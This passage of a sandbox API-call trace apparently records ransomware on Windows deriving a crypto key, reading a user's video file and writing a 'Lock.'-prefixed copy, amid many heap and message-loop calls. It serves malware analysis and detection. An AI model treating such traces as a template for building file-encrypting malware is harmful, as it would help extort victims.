| out: lpMsg=0x8cef58) returned 0 [0213.768] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.768] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0213.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab440, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0213.768] CryptDeriveKey (in: hProv=0xa7be68, Algid=0x6601, hBaseData=0x9e21f8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2238) returned 1 [0213.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.769] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.769] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0213.769] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.769] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0213.769] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0213.769] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0213.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6fe0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0213.769] CryptDestroyHash (hHash=0x9e21f8) returned 1 [0213.769] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.769] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.769] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.769] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.769] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.770] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/RV_dV0DIDgvgK.avi" (normalized: "c:\\users\\fd1hvy\\videos\\rv_dv0didgvgk.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0213.771] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0213.771] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0213.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7120 [0213.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0213.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0213.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0213.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0213.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0213.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0213.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0213.771] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0213.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0213.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0213.771] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0213.771] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0213.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0213.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0213.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0213.771] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0213.771] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0213.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0213.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0213.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0213.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0213.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0213.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0213.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0213.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0213.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0213.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0213.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0213.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0213.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74a50 [0213.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0213.772] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos/" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0213.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74a50 | out: hHeap=0x2af0000) returned 1 [0213.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0213.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0213.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0213.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0213.773] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0213.773] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/Lock.RV_dV0DIDgvgK.avi" (normalized: "c:\\users\\fd1hvy\\videos\\lock.rv_dv0didgvgk.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0213.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f60 [0213.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0213.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0213.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0213.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0213.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0213.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0213.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0213.774] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0213.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0213.774] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0213.774] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.774] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0213.774] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0213.775] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0213.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0213.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0213.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0213.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0213.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0213.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0213.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0213.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0213.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0213.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0213.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0213.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0213.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0213.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0213.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0213.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0213.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0213.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0213.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0213.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0213.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0213.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0213.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0213.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0213.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0213.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0213.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0213.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0213.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0213.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50ef020 [0213.778] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0213.778] ReadFile (in: hFile=0x520, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0xeca2, lpOverlapped=0x0) returned 1 [0213.781] ReadFile (in: hFile=0x520, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0213.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0213.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0213.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0213.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0213.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xeca2) returned 0x2a8a138 [0213.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50ef020 | out: hHeap=0x2af0000) returned 1 [0213.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0213.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0213.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0213.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0213.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0213.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0213.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0213.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xeca2) returned 0x2aae878 [0213.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0213.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0213.786] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0213.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0213.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0213.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0213.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0213.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xeca2) returned 0x2a8a138 [0213.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0213.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0213.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0213.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0213.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0213.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0213.787] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0213.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0213.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0213.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0213.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0213.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0213.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0213.787] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0213.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0213.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0213.787] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0213.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0213.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0213.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0213.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72288 [0213.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0213.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0213.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0213.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0213.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xeca2) returned 0x2a8a138 [0213.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0213.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72388 [0213.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0213.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0213.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0213.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0213.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0213.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0213.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0213.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72208 [0213.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0213.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0213.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0213.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab188 [0213.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0213.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0213.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0213.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0213.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0213.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0213.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0213.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xeca2) returned 0x2abd528 [0213.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0213.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0213.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0213.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0213.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0213.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0213.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0213.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0213.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0213.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0213.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0213.790] 